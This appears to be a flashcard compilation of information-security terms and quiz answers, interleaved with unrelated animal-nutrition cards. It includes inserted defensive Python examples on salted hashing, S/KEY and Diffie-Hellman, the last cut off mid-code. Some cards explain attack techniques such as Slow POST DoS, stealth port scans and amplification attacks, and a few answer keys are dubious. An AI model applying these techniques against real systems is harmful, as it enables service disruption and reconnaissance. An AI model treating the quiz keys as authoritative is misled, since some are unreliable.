Masking the source of a communication (phone or email) to look like a reputable source (e.g. government, call within a company, etc.).
What is Spoofing?
Masking the source of a communication (phone or email) to look like a reputable source (e.g. government, call within a company, etc.).
Formulating Diets for Livestock and Poultry
Meeting the energy requirement: -Cattle: DE, TDN, NEG -Dairy: DE, NEL -Horses: DE, TDN -Pigs: DE,ME, NE -Poultry: ME, AME, TME
[9.4] Why is symmetric cryptography alone unable to provide non-repudiation?
Message authentication using a MAC only shows that one of the parties who knows the shared secret key formed the MAC (for example shopper and merchant), and a third party (judge) will not be able to decide which of those two parties performed the action.
Diffie-Hellman Key Agreement Algorithm
Method for securely exchanging cryptographic keys over a public channel. - Uses modular exponentiation - Relies on difficulty of discrete logarithms for security (g^b)^a = g^(ab) mod p (g^a)^b = g^(ab) mod p
Vulnerabilities
Mistakes in programs that allow bad things to happen Biggest vulnerability: USERS Cross site scripting, Cross site request forgery, cookie injection
The ____________________ control strategy attempts to reduce the impact caused by the exploitation of vulnerability through planning and preparation.
Mitigation
[9.2] What sort of mathematics is required to perform Diffie-Hellman key agreement?
Modular exponentiation: integer exponentiation over a finite set of integers. The modulus is a prime number.
Which of the following is not a motion detection method?
Moisture
Fat Quality
Moisture, Impurities, Unsaponifiables -(MIU index) -Has little direct effect on nutritional value of fat -Collectively, they dilute the energy Moisture: -high level can accelerate oxidation and rancidity Impurities: -Dirt, hair, protein Unsaponifiables: -Sterols, other hydrocarbons that are not saponified -Usually not digestible Free Fatty Acid (FFA, %) -Measures fatty acids not esterified to glycerol -Heat and moisture increase [FFA] -May also come from soapstock added back to feed (cottonseed, soybean oil processing) -FFA have reduced digestibility Total Fatty Acids (TFA): -Typical triglyceride is 10% glycerol and 90% fatty acid
Layered Security
Most sensitive information is accessed by the least number of people. Internal access controls are placed on data. Cheaper and simpler than perimeter security. Widely used in business
Distributed Denial of Service (DDoS)
Multiple compromised machines send too many legitimate requests for the computer to handle. The attacking machine completes the three-way handshake. No IP spoofing. The attacker uses zombies to make many legitimate requests. The master is the attacker's machine. Handlers are zombies that have 1000 agents. Agents perform the DDoS itself.
What is NOT a commonly used endpoint security technique?
Network firewall
[9.2] One problem with Diffie-Hellman key agreement is that each entity has no assurance about the identity of the entity they are communicating with. What sort of attack is possible as a result of this problem and what impact does this have on the security of subsequent communications?
No authentication means Man-In-the-Middle (MIM) attack is possible. - MIM can establish keys with sender and receiver and send messages pretending to be either of them. - Communications aren't really secure: Attacker can view and modify communications so Confidentiality and Integrity can be breached.
What level of technology infrastructure should you expect to find in a cold site alternative data center facility?
No technology infrastructure
Conversion of Dietary Fat to Body Fat
Non-ruminants: (pig, chicken, dog, cat, human, horse, fish) -"You are what you eat" -Feeding unsaturated fat in the diet results in unsaturated fat in body tissues Ruminants: (cattle, sheep, deer) -Biohydrogenation converts UNSAT to SAT -Difficult to change the fatty acid profile of meat and milk from ruminants
What is P = D(C,Kpriv)?
Notation for asymmetric decryption. Plaintext = Decryption (Ciphertext, Private Key)
What is C = E(P,Kpub)?
Notation for asymmetric encryption. Ciphertext = Encryption (Plaintext, Public Key)
Perimeter Security
Nothing leaves unless explicitly authorized. All information is checked at perimeter. Used in contexts where any leaked information is bad. Government, Military. Expensive and complex.
SSL (Secure Sockets Layer)
Now called TLS (Transport Layer Security)
Denial of Service (DoS) Attack
Objective is to make an information asset or resource unavailable to authorised user.
Attacks
Occur when vulnerabilities are deliberately exploited.
[9.1] How many keys are required for two people to communicate confidentially using symmetric cipher?
One shared key is required.
____ feasibility analysis examines user acceptance and support, management acceptance and support, and the overall requirements of the organization's stakeholders.
Operational
Behavioral feasibility is also known as _________________________.
Operational Feasibility
Maria's company recently experienced a major system outage due to the failure of a critical component. During that time period, the company did not register any sales through its online site. Which type of loss did the company experience as a result of lost sales?
Opportunity cost
Transmission Control Protocol (TCP)
Optimized for reliability. Connection oriented protocol. Make two way channel between hosts. Handshaking protocol to secure connection.
User Datagram Protocol (UDP)
Optimized for speed
Plaintext (P)
Original message or data
What's the impact of Credential Replay?
Our client's account is compromised, and the cybercriminal can quickly re-use their credentials to access other accounts, and steal additional funds and confidential data before detection.
Security Concepts
Owners, usefulness, availability, assets, Risk, threat, vulnerability, exploit, countermeasures, attackers
Physiological Fuel Values (PFV)
PFV = ME values -CHO = 4 kcal/g -Fat = 9 kcal/g -Protein = 4 kcal/g •Used on food labels for calculation of Calories
c. non-repudiation
Proving that a user sent an email message is known as ______________. a. repudiation b. integrity c. non-repudiation d. availability
personal identification number
PIN
Holly would like to run an annual major disaster recovery test that is as thorough and realistic as possible. She also wants to ensure that there is no disruption of activity at the primary site. What option is best in this scenario?
Parallel test
Objects
Passive entities in the system that contain or receive information. Objects are repositories of information such as disks, files and datasets. Objects are the resources being accessed.
A hospital is planning to introduce a new point-of-sale system in the cafeteria that will handle credit card transactions. Which one of the following governs the privacy of information handled by those point-of-sale terminals?
Payment Card Industry Data Security Standard (PCI DSS)
Which one is not a typical baseline configuration?
Performing a security risk assessment
Attacker
Person who deliberately attempts to exploit a vulnerability to gain unauthorized access or perform unauthorized actions.
What is the most common form of Social Engineering
Phishing
Link layer
Physical communication layer. Local. Protocol operations: - Ethernet - WLAN (WEP) - ADSL - 3G etc.
Tokens
Physical key, swipe card, ID badge etc. Can generate sequence of one-time passwords.
Binary Additive Stream Cipher
Plaintext, keystream and ciphertext are all streams of bits, combining operation is just XOR (addition modulo 2). - Do NOT provide integrity protection
[7.1] What TCP port is reserved for SSH connections?
Port 22
Information security
Preservation of confidentiality, integrity and availability of information; in addition, other properties such as authenticity, accountability, non-repudiation and reliability can also be involved.
Confidentiality
Prevent unauthorized DISCLOSURE of information.
Integrity
Prevent unauthorized MODIFICATION or DESTRUCTION of information.
[CRYPTO] What type of measure is implemented to ensure message is confidential?
Preventative
Need to know principle
Principle of least privilege in the case that the resource is information : only given info you need to perform your job.
privacy
Privacy - Individual or organization cannot be identified with sensitive information. - 25, Bank street, Doha (Public) - Address of Khaled is: 25, Bank street, Doha (Privacy issue) - Anonymity is related to privacy.
How do Asymmetric ciphers for integrity work?
Private key = digital signature for a particular message or file. Public key used to verify digital signature on message: - Provides authentication of sender - Since only signer knows private key they are only one who can generate digital signature
Productivity Improvements
Productivity improvements in plant and animal agriculture were done by simple selection for the better producing animals.
The ____ security policy is a planning document that outlines the process of implementing security in the organization.
Program
Trojan horses
Programs with known desirable properties and hidden undesirable property.
Viruses
Programs with the ability to replicate. Spreads by copying itself into other files (infecting) and is activated when these files are open or executables are run.
Worms
Programs with the ability to self replicate. Spread from computer to computer without human interaction.
Amphipathic Lipids
Property whereby regions of a molecule are hydrophobic and regions are hydrophilic. •Types of Amphipathic Lipids -Phospholipids -Free Fatty acids -Free Cholesterol
IP Security (IPsec) - Internet layer
Provides security services at the IP level and is used to provide Virtual Private Network (VPN) services. Network security protocol.
WiFi security (WEP, WPA) - Link layer
Provides security services at the link layer for wireless communication. Network security protocol.
d. perfect forward secrecy
Public key systems that generate random public keys that are different for each session are called __________________. a. Public Key Exchange (PKE) b. Elliptic Curve Diffie-Hellman (ECDH) c. Diffie-Hellman (DH) d. perfect forward secrecy
What folder do you publish to in your astro account
Public_html
Handshaking Protocol
Purpose 1. server authentication 2. negotiation 3. key establishment 4. client authentication (maybe)
[9.6] Ransomware such as CryptoLocker uses encryption to encrypt the files on a victim's computer, then demands that they pay a ransom to be able to decrypt their files. Why does the design of the system make it impossible for users to decrypt the files on their own?
RSA public key was generated by the control server and the RSA private key was never copied to the user's computer, so the user does not have access to the private key to decrypt the files.
[5.8] What does False Match Rate (FMR) mean?
Rate at which biometric measurements from two different persons are incorrectly declared to be from the same person.
[5.8] What does False Non-Match Rate (FNMR) mean?
Rate at which two biometric measurements from the same person are incorrectly declared to be from two different persons.
What are Stream ciphers used for?
Real-time applications where time delays are unacceptable. (They are fast) E.g. 1. Communications, including internet traffic - RC4 2. Mobile telephony - A5/1 and A5/2 in GSM standard 3. Video (pay TV) - Digital Video Broadcasting (DVB) uses Common Scrambling Algorithm
Which group is the most likely target of a social engineering attack?
Receptionists and administrative assistants
Typo Squatting
Redirecting a user to fictitious website based on a misspelling of a URL. also called URL hijacking.
URL hijacking
Redirecting a user to fictitious website based on a misspelling of a URL. also called typo squatting.
Botnet
Refers to a collection of computers autonomously or automatically working together toward some goal; these are often zombie computers that are synchronized to perform illegal activities on the internet ex. money
Information Theft
Refers to the access of information by an unauthorized person for financial gain or benefit
Internet Security
Refers to unique threats and defenses associated with computers connected to the internet
Improving DDoS
Reflection attacks (send requests with the victim's address spoofed as the source, so third-party servers deliver their replies to the victim) and amplification attacks (pick a protocol where a small request produces a much larger response, e.g. DNS or NTP, multiplying the attacker's bandwidth).
Which of the following is NOT an activity phase control?
Resource control
Example of Corrective controls
Restore apps to last known good image to bring corrupted system back online.
Relationship of Intake to Energy Retention
Retained energy = protein and lipid deposition Determined using comparative slaughter technique. Can also be milk production in dairy
[9.4] What is non-repudiation?
Security service that ensures that users cannot falsely deny an action has occurred.
Metamorphic Virus
Rewrites itself into a logically equivalent form: the entire virus body is rewritten on every infection, so each copy works in a different way but produces the same results.
Polymorphic Virus
Keeps its body encrypted and randomly mutates the decryption routine on every infection, so there is no consistent byte signature for antivirus software to look for.
____ equals likelihood of vulnerability occurrence times value (or impact) minus percentage risk already controlled plus an element of uncertainty.
Risk
Which formula is typically used to describe the components of information security risks?
Risk = Threat X Vulnerability
The first phase of risk management is ____.
Risk Identification
____________________ involves three major undertakings: risk identification, risk assessment, and risk control.
Risk Management
____________________ is the process of identifying risk, as represented by vulnerabilities, to an organization's information assets and infrastructure, and taking steps to reduce this risk to an acceptable level.
Risk Management
George is the risk manager for a U.S. federal government agency. He is conducting a risk assessment for that agency's IT risk. What methodology is best suited for George's use?
Risk Management Guide for Information Technology Systems (NIST SP800-30)
Earl is preparing a risk register for his organization's risk management program. Which data element is LEAST likely to be included in a risk register?
Risk survey results
SANS
SANS is one of the most trusted sources for information security training, certification, and research.
Alien SW
Software running on a computer that users are unaware of; it consumes valuable system resources and can track web surfing and other personal behaviour: adware, spyware, tracking cookies.
What is NOT one of the three tenets of information security?
Safety
Synchronisation
Sender and receiver must generate the same keystream and apply it at the same position with respect to the plaintext/ciphertext. If a ciphertext bit is lost or inserted in transit the two sides fall out of step and everything after that point decrypts to garbage.
Unsaturation
Saturated -no double bonds Monounsaturated = 1 double bond Polyunsaturated = 2 or more double bonds Usually in "cis" configuration -"trans" configuration found in rumen microorganisms and in chemical hydrogenation. Position of bonds is important
Cryptographic Key (K)
Secret knowledge
Secure Socket Layer (SSL)
Secure communication method which protects web traffic
Sneaky manipulation of TCP
FIN scan: send a TCP FIN to a port with no prior connection. Per RFC 793 a port in LISTEN ignores it (no reply) while a CLOSED port answers with RST, so silence suggests open; no connection attempt is made, so the application logs nothing. (Caveat: Windows and some other stacks reply RST regardless of port state, so a FIN scan tells you nothing there.) SYN (half-open) scan: send a SYN; an open port responds with SYN/ACK, a closed port with RST. Reply to the SYN/ACK with RST so the handshake never completes and no connection is made.
TCP / UDP
Send data between applications. Both use logical ports tied to an application / protocol. Port 80 is an example
Internet Protocol (IP)
Send data between hosts. Header contains: Source host, Destination Host. IP body contains TCP/UDP data, Application data.
POST DoS
Slow POST: open many connections and send POST requests with large Content-Length headers, then send the body one character every 10 to 100 seconds. Each connection stays open and counted, so the server hits its active connection limit with very little attacker bandwidth. Defences: enforce a minimum body receive rate or body read timeout and cap connections per source address.
Phishing
Sending an email or displaying a web announcement that falsely claims to be from a legitimate enterprise in an attempt to trick the user into surrendering private information.
Record Protocol
Sending: gets application message, breaks it up, encrypts data, transmits in TCP segment. Receiving: decrypted, reassembled then passed to application.
Intrusion Detection System
Sensors distributed through the network, looking for suspicious activity.
Firewall
Separates trusted and untrusted networks; isolates the organisation's network from the internet. Allows only authorised access into the network, absorbs some flooding traffic before it reaches hosts (it does not stop a DDoS that saturates the link), and limits propagation after an infection by blocking lateral traffic.
Keylogger
Software or a hardware device that captures and stores each keystroke that a user types on the computers keyboard.
Malware
Software that enters a computer system without the users knowledge or consent and then performs an unwanted and usually harmful action.
[1.4] One of the services provided by AusCERT is a Security Bulletins Service. What sort of information assets do the Security Bulletins relate to?
Software. There are descriptions of vulnerabilities in particular software, sometimes reports that these have been exploited 'in the wild', and some bulletins advise on control measures available.
Threats
Set of circumstances with potential to cause harm to an information asset by compromising stated information security goals.
[7.2] Briefly explain the purpose of the TLS Handshake protocol.
Set up the secure connection: negotiate the protocol version and cipher suite, authenticate the server (and optionally the client), and establish the shared master secret from which the session keys used by the Record protocol are derived.
What's the impact of Spoofing?
Similar to the other cyberattacks we've discussed, our client's money is stolen, and they become the victim of fraud and/or identity theft.
Classification
Simple: -Fats and oils: •Esters of fatty acids with glycerol = triglycerides •Fats (solid at room temp), oils (liquid at room temp) -Waxes •Esters of fatty acids with high MW alcohols Complex: -Phospholipids -Glycolipids and other complex lipids Precursor and Derived: -Fatty acids, glycerol, steroids, ketone bodies
As a follow-up to her annual testing, Holly would like to conduct quarterly disaster recovery tests that introduce as much realism as possible but do not require the use of technology resources. What type of test should Holly conduct?
Simulation test
Macro
Macro virus: script code embedded in a document for an application with scripting capability (e.g. Office macros); it runs when the document is opened.
What is the technique used for phishing
Social engineering
Backdoor
Software code that gives access to a program or a service that circumvents normal security protections.
Internal Source
Source of threat lies within the organisation. Authorized to use information system.
External Source
Source that lies outside the organisation. Not authorized to use information system.
Trans Fatty Acids
Sources:-Hydrogenated fats Soy oil(liquid) to Crisco(solid) done through Hydrogenation, Heat, and catalyst, H2 Meat and milk from ruminants -Biohydrogenation produces some trans fatty acids
When organizations adopt levels of security for a legal defense, they may need to show that they have done what any prudent organization would do in similar circumstances. This is referred to as a(n) ____.
Standard of Due Care
AS/NZS 27002:2006 Clause 7 Asset management: 7.1 Responsibility of Assets.
Standard. 7.1.1 Inventory of assets - type, format, location, backup info, license info and business value of all assets 7.1.2 Ownership of assets 7.1.3 Acceptable use of assets - rules for email + internet use, guidelines for use of mobile devices.
AS/NZS 27002:2006 Clause 7 Asset management: 7.2 Information Classification
Standard. 7.2.1 Classification guidelines - classify based on value, legal reqs., sensitivity, criticality - need for sharing/restricted info and assoc. business impact. - classification varies over time = review + reclassify. 7.2.2 Information handling and labelling - procedures for info labelling particularly of sensitive and critical material.
(Property) Physical assets require
Suitable location Physical security mechanisms (gate etc.) Maintenance Monitoring and logging
Which is faster: Symmetric or Asymmetric ciphers?
Symmetric ciphers are much faster because they are less computationally expensive.
Identifying Security Compromises
Symptoms: Antivirus software detects a problem. Disk space disappears unexpectedly. Pop-ups suddenly appear, sometimes selling security software. Files or transactions appear that should not be there. The computer slows down to a crawl. Unusual messages, sounds, or displays on your monitor. Stolen laptop: 1 stolen every 53 seconds; 97% never recovered. The mouse pointer moves by itself. The computer spontaneously shuts down or reboots. Often unrecognized or ignored problems.
Mandatory access control (MAC)
System wide set of rules applied. Central authority assigns attributes to objects and to subjects. - Subjects assigned clearance levels - Objects assigned classification levels
____ policies address the particular use of certain systems.
Systems-specific
Energy Values: Species Differences
Tables of nutrient composition -Amino acids, minerals, vitamins in ingredients are similar for all species. -Amino acid digestibility may differ by species. -Energy values are species specific
[1.2] What do researchers claim to be able to do to the Jeep Cherokee?
Take over the vehicle remotely, control entertainment system, climate control, driving controls via wireless connection.
Examples of Feed Fats
Tallow Choice White Grease Yellow Grease Poultry Fat Animal / Vegetable Blend Quality Criteria: -Moisture, Impurities, Unsaponifiables (< 1-2%) -Titre (melting point, related to Unsat / Sat FA) -Free Fatty Acids (< 2-5%) -Total fatty acids (90% minimum)
Targeted spear phishing email
Targeted at a specific individual, usually after background research on the target. E.g. the attacker knows Douglas is a lecturer in information security and writes pretending to be a prospective student looking for a PhD supervisor.
Security ____________________ are the technical implementations of the policies defined by the organization.
Technologies
[3.6] Employee finds USB in foyer and accesses it. Vulnerabilities?
Technology: the antivirus software may not detect what is on the USB. People: staff lack the education to treat an unknown USB as hostile and have no process for handling it. Process: is there a procedure for handling unknown removable media or lost property?
b. encrypts the key and the message
The Hashed Message Authentication Code (HMAC) __________. a. encrypts only the key b. encrypts the key and the message c. encrypts only the message d. encrypts the DHE key only (Note: the textbook wording is loose. HMAC encrypts nothing; it hashes the message together with the key, HMAC(K, m) = H((K xor opad) || H((K xor ipad) || m)), so the message is authenticated, not made confidential.)
d. provides cryptographic services in hardware instead of software.
The Trusted Platform Module (TPM) ____________. a. allows the user to boot a corrupted disk and repair it b. is available only on Windows computers running BitLocker. c. includes a pseudorandom number generator (PRNG) d. provides cryptographic services in hardware instead of software.
Dumpster Diving
The act of digging through trash receptacles to find information that can be useful in an attack.
b. in the directory structure of the file system
The areas of a file in which steganography can hide data include all of the following EXCEPT_________. a. in data that is used to describe the content or structure of the actual data b. in the directory structure of the file system c. in the file header fields that describe the file d. in areas that contain the content data itself.
Other Security Objectives to Identify Threats/Attacks
There are more "security" objectives - Traceability and Auditing - Monitoring and Surveillance - Security Assurance - that the security goals are met • "information assurance"
Domain Name System Protocol (DNS)
Ties web addresses and IP addresses together. Application protocol that ties domain names and IP addresses together. System creates a DNS request, routed to the DNS server, DNS server returns the IP address of the website.
TOTP
Time-based One-Time Password (RFC 6238). A clock-based token: the code is an HMAC over the current time step (usually 30 seconds) keyed with a secret shared between token and server, truncated to 6 to 8 digits. Token and server clocks must agree to within the server's acceptance window.
Keystream
Time-varying function of a key.
[5.3] Explain the basic operation of S/KEY in terms of what is computed and stored on the server side.
The server stores only the current top of the hash chain, initially Hn(w), together with the counter n; it never stores w. When the client sends Hn-1(w) the server computes the hash of that value and compares it with the stored Hn(w). If it matches, authentication of the client is complete and the server replaces the stored value with the value just received and decrements the counter, so the same value can never be accepted twice.
[5.3] Explain the basic operation of S/KEY in terms of what is computed and stored on the client side.
The client holds the secret w (key). To set up the system, apply the hash function to w repeatedly, n times, and register Hn(w) with the server. For each subsequent login the client computes one fewer hash application than last time: Hn-1(w) first, then Hn-2(w), and so on. w itself is never transmitted, and because H is one-way an eavesdropper who captures Hn-1(w) cannot compute the next value Hn-2(w).
Heat production
Total heat production = -Heat increment -Net energy for maintenance HP = HI + NEm Determination -Calorimetry •Direct -measure temperature change in chamber •Indirect -measure O2 and CO2, calculate HP
The ____ strategy attempts to shift risk to other assets, other processes, or other organizations.
Transfer Control
Encoding
Transforming data from one form to another using an encoding algorithm. (NO secret key)
Encryption
Transforming data from one form to another using an encryption algorithm and secret key.
Cryptography
Transforming messages into an unintelligible form and recovering them using secret knowledge.
Decryption (D)
Transforming the ciphertext back to the original plaintext, using an algorithm and key
Benefit is the value that an organization realizes by using controls to prevent losses associated with a specific vulnerability.
True
Best business practices are often called recommended practices.
True
Replay attack
Valid data transmission is recorded and retransmitted at a later date.
What is Call forwarding?
The cybercriminal has arranged, either through the phone company or a compromised phone, for all calls to our client's home and/or cell phone number to be forwarded to their phone.
Pharming - Counterfeit Web Pages
The fraudulent practice of directing users to a bogus website in order to obtain personal information
[5.2] Explain the problem with stored hash values that can be addressed by including a random but known salt value.
The problem with straight hash values is that identical passwords produce identical hashes, so a leaked password file reveals which users share a password, and an attacker can precompute the hashes of common passwords once (rainbow tables) and compare them against every user at once. A salted hash, where the salt is a random value that is different for every user and stored alongside the hash, disguises the repetition and forces the attacker to recompute the hash separately for each user.
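The contrast described on the card, as an added example (not from the original page). The unsalted scheme leaks which users share a password without any cracking at all; the salted records use a per-user random salt with PBKDF2-HMAC-SHA256 and a self-describing format so the work factor can be raised later. The iteration count is an assumption to be tuned per deployment (600,000 follows OWASP's 2023 guidance); the usernames and passwords are constructed sample data.

```python
import hashlib
import hmac
import secrets

# Work factor for PBKDF2-HMAC-SHA256. Assumption: tune for your hardware; 600,000 follows OWASP's 2023 guidance.
ITERATIONS = 600_000


def unsalted_hash(password: str) -> str:
    """The weak scheme the card describes: same password, same stored value for every user."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def users_sharing_passwords(records: dict) -> list:
    """What an attacker reads straight off a leaked unsalted table: groups of users with equal digests."""
    seen = {}
    for user, digest in records.items():
        seen.setdefault(digest, []).append(user)
    return [users for users in seen.values() if len(users) > 1]


def make_record(password: str, salt: bytes = None, iterations: int = ITERATIONS) -> str:
    """Per-user random salt plus a slow hash; the record carries its own parameters."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

Two users with the same password now get two different records, and checking a password candidate against the table costs one PBKDF2 computation per user instead of one lookup for all of them.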
risk analysis
The process by which an organization assesses the value of each asset being protected, estimates the probability that each asset might be compromised, and compares the probable costs of each being compromised with the costs of protecting it.
Enumeration
The process of identifying low hanging fruit and user accounts. Scanning shows you the doors, enumeration identifies how to get through them safely.
[5.3] Explain the basic operation of S/KEY in terms of what is sent each time the protocol is run.
Each run sends a single hash-chain value, one step further down the chain than the previous run: Hn-1(w) the first time, Hn-2(w) the second, and so on. After each successful run the server discards Hn(w) and stores Hn-1(w). After n logins the chain is exhausted and a new secret must be set up.
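The S/KEY exchange from the three [5.3] cards (setup, server-side check, what is sent each time), as an added example that is not part of the original page. SHA-256 stands in for the MD4 of the original S/KEY, the chain length and the secret are constructed for the demo, and the classes are illustrative rather than any real implementation. The point to observe is that the server never holds w, a captured value cannot be replayed, and the next value cannot be derived from the captured one.

```python
import hashlib
import secrets

# Chain length n: how many logins the server will accept before w must be re-seeded (constructed value).
N_ROUNDS = 100


def h(value: bytes) -> bytes:
    """One application of the one-way function H (SHA-256 here; original S/KEY used MD4)."""
    return hashlib.sha256(value).digest()


def chain(secret: bytes, rounds: int) -> bytes:
    """H^rounds(w): apply H 'rounds' times to the secret w."""
    out = secret
    for _ in range(rounds):
        out = h(out)
    return out


class SkeyServer:
    """Stores only the current top of the chain and the counter, never w."""

    def __init__(self, top_of_chain: bytes, rounds: int):
        self.stored = top_of_chain      # initially H^n(w)
        self.remaining = rounds

    def authenticate(self, candidate: bytes) -> bool:
        if self.remaining <= 0:
            return False                # chain exhausted: re-seed before accepting anything
        if h(candidate) != self.stored:
            return False                # wrong value, or a replay of an already-used value
        self.stored = candidate         # discard H^k(w), keep H^(k-1)(w)
        self.remaining -= 1
        return True


class SkeyClient:
    """Holds w and walks down the chain: sends H^(n-1)(w), then H^(n-2)(w), ..."""

    def __init__(self, secret: bytes, rounds: int):
        self.secret = secret
        self.remaining = rounds

    def next_password(self) -> bytes:
        self.remaining -= 1             # stop well before 0 in practice so w itself is never sent
        return chain(self.secret, self.remaining)


def demo():
    w = secrets.token_bytes(16)                         # constructed secret; stays on the client
    client = SkeyClient(w, N_ROUNDS)
    server = SkeyServer(chain(w, N_ROUNDS), N_ROUNDS)   # registration: server receives H^n(w) only

    p1 = client.next_password()                         # H^(n-1)(w) goes over the wire
    first_login = server.authenticate(p1)               # server checks H(p1) == stored H^n(w)
    replay = server.authenticate(p1)                    # eavesdropper replays p1: H(p1) != stored p1
    p2 = client.next_password()                         # H^(n-2)(w): not computable from p1 (H one-way)
    second_login = server.authenticate(p2)
    return first_login, replay, second_login
```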
Command and Control (C&C or C2)
The structure by which a bot herder gives instructions to zombies in a botnet.
Defense and control : Example Security Technologies
These technologies may be provided by the infrastructure/platform an application builds on, - Networking infrastructure • which may use SSL - Operating system or database system • providing e.g. access control - Programming platform • for instance Java or .NET sandboxing
Attackers
Those who execute attacks, or cause them to be executed, are called attackers
After identifying and performing the preliminary classification of an organization's information assets, the analysis phase moves on to an examination of the ____________________ facing the organization.
Threats
Asset ____________________ is the process of assigning financial value or worth to each information asset.
Valuation
Trojan Horses
Trojan Horse: masquerades as a benign program while quietly destroying data or damaging your system. Example: download a game; it may be fun but contains hidden code that gathers personal information without your knowledge. A Trojan disguises itself as an entirely legitimate program (such as a screensaver), but behind the scenes it is causing damage such as: allowing someone else to gain control of the computer; copying personal information, deleting information, monitoring keystrokes; using email software to pass itself on to other computers. Unlike viruses and worms, Trojans are not self-replicating; they rely on their apparent usefulness to spread between computers. Some Trojans work in isolation. Some rely on networks, either to transmit stolen information (such as passwords, bank account details or credit card numbers) or to act as back doors to compromised computers. They allow attackers to bypass the operating system's security features and gain access to data or even control the machine over a network.
A DoS attack is a coordinated attempt to deny service by occupying a computer to perform large amounts of unnecessary tasks.
True
A birthday attack is a type of cryptographic attack that is used to make brute-force attack of one-way hashes easier.
True
A certificate authority should actually be categorized as a software security component.
True
A disaster recovery plan (DRP) directs the actions necessary to recover resources after a disaster.
True
A phishing email is a fake or bogus email intended to trick the recipient into clicking on an embedded URL link or opening an email attachment.
True
A surge protector is an example of a preventative component of a disaster recovery plan (DRP).
True
A(n) exposure factor is the expected percentage of loss that would occur from a particular attack.
True
A(n) qualitative assessment is based on characteristics that do not use numerical measures.
True
An alteration threat violates information integrity.
True
Authentication controls include passwords and personal identification numbers (PINs).
True
Essential Fatty Acids
Typically: -Linoleic (ω-6) = C 18:2 Δ 9,12 -Alpha-Linolenic(ω-3)= C18:3 Δ 9, 12,15 Others: -Arachidonic (ω-6)= C 20:4 Δ 5, 8,11, 14 Can be synthesized from 18:2 -EPA* (ω-3) 20:5 Δ5, 8, 11,14,17 -DHA* (ω-3) 22:6 Δ4, 7, 10, 13,16,19 *Can be synthesized from 18:3, but conversion is inefficient
fraggle attack
UDP variant of smurf attack
MITM Interception
Unauthorized MITM observes the info and transmits it.
MITM Interruption
Unauthorized MITM prevents transmission.
URL
Uniform Resource Locator
IP Address
Unique identifier for a host.
MAC Address
Unique identifier of a networked device
Spam
Unsolicited emails
Who's Script Kiddies:?
Unsophisticated computer users who know how to execute programs
An attacker attempting to break into a facility pulls the fire alarm to distract the security guard manning an entry point. Which type of social engineering attack is the attacker using?
Urgency
Example of Detective controls
Use checksum/MAC to detect data corruption.
[5.3] Give an example of a situation in which S/KEY could be used.
Use for authenticating to a system from an untrusted public computer (Internet café?). Don't want to use a reusable password which may be captured and replayed later.
Secure Shell (SSH)
Used for remote login, file transfer and limited VPN service. Provides public key authentication of servers and clients and encrypted communication.
Anabolic Steroids
Used in cattle to improve growth rate and feed efficiency. •Increase protein deposition, decrease fat. •Rate of return $15:1. •Typically get greater response in steers than heifers. •Not used in dairy, pork, poultry
Address Resolution Protocol (ARP)
Link-layer protocol that maps an IP address to a MAC address on the local network. The host first checks its ARP cache; if there is no entry it broadcasts "who has this IP?", the owner replies with its MAC address, and the mapping is cached. Replies are not authenticated, so a host can send forged replies (ARP spoofing) and have traffic for another host delivered to itself.
Dynamic Host Configuration Protocol (DHCP)
Application-layer protocol for handing out network configuration. A new machine broadcasts a DHCP discover packet; the DHCP server replies with an IP address to use, the subnet mask, the name and IP address of the DNS server and the IP address of the 'first hop' (default) router. The lease is tied to the client's MAC address.
[9.4] Why is non-repudiation important for e-commerce?
Useful for resolving a dispute about some action that has occurred. Example: whether a contract was signed or a transaction authorised. Digital signatures provide authentication of the message sender, integrity and non-repudiation, so that is useful for e-commerce.
Which of the following is not an advantage to an automated patch update service?
Users can disable or circumvent updates just as they can if their computer is configured to use the vendor's online update service.
Shoulder Surfing
Watching an authorized user enter a security code on a keypad.
What does Spoofing look like?
We receive an email from a cybercriminal who impersonates one of our clients and confirms a fraudulent wire transfer request.
Vulnerabilities
Weaknesses in a system that could cause harm to information assets.
Once the inventory and value assessment are complete, you can prioritize each asset using a straightforward process known as ____________________ analysis.
Weighted Factor
In a(n) ____, each information asset is assigned a score for each of a set of assigned critical factor.
Weighted Factor Analysis
a. plaintext
What is data called that is to be encrypted by inputting it into a cryptographic algorithm? a. plaintext b. cleartext c. opentext d. ciphertext
b. SHA-3
What is the latest version of the Secure Hash Algorithm? a. SHA-2 b. SHA-3 c. SHA-4 d. SHA-5
Footprinting questions
What software is the target based on? What language does the target use? How can you communicate with the target?
Tailgating
When an unauthorized individual enters a restricted-access building by following an authorized user.
Masquerade/Spoofing
Where one entity pretends to be another in order to deceive others.
c. RSA
Which asymmetric cryptographic algorithm is the most secure? a. SHA-2 b. BTC-2 c. RSA d. ME-14
d. RSA
Which asymmetric encryption algorithm uses prime numbers? a. EFS b. quantum computing c. ECC d. RSA
Which of these is a list of approved email senders?
White list
Transport Layer Security (TLS)
Widely used security protocol, available to any TCP application. Sits between TCP and the application layer: the application hands TLS a byte stream, TLS hands TCP authenticated and encrypted records. Requirements: carry a byte stream and interactive data, a set of secret keys for the entire connection, exchange certificates as part of the protocol.
If you use Diffie-Hellman Key Agreement alg. do you have to worry about an attack?
Yes. Plain Diffie-Hellman defeats only a passive eavesdropper: the exchanged public values give no information about the key. But there is no authentication, so an active attacker can run the protocol separately with each party (man-in-the-middle), ending up with one key shared with each side, and when they establish the key neither party has any assurance of who it is communicating with. The fix is to authenticate the public values, e.g. with certificates and signatures as TLS does.
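The man-in-the-middle failure described above, as an added example that is not from the original page: an honest run, an attacked run in which Mallory ends with a key shared with each victim, and an authenticated variant in which the public value is tagged with a pre-shared authentication key so the substituted value is rejected. The group (p = 2^127 - 1, g = 3) is a toy chosen to run instantly, not a recommended parameter set; real deployments use an RFC 7919 group or ECDH, and the HMAC tag stands in for the certificate-backed signature TLS uses.

```python
import hashlib
import hmac
import secrets

# Toy group so the arithmetic runs instantly. Assumption for the demo only; use RFC 7919 groups or ECDH.
P = 2 ** 127 - 1
G = 3


def keypair():
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


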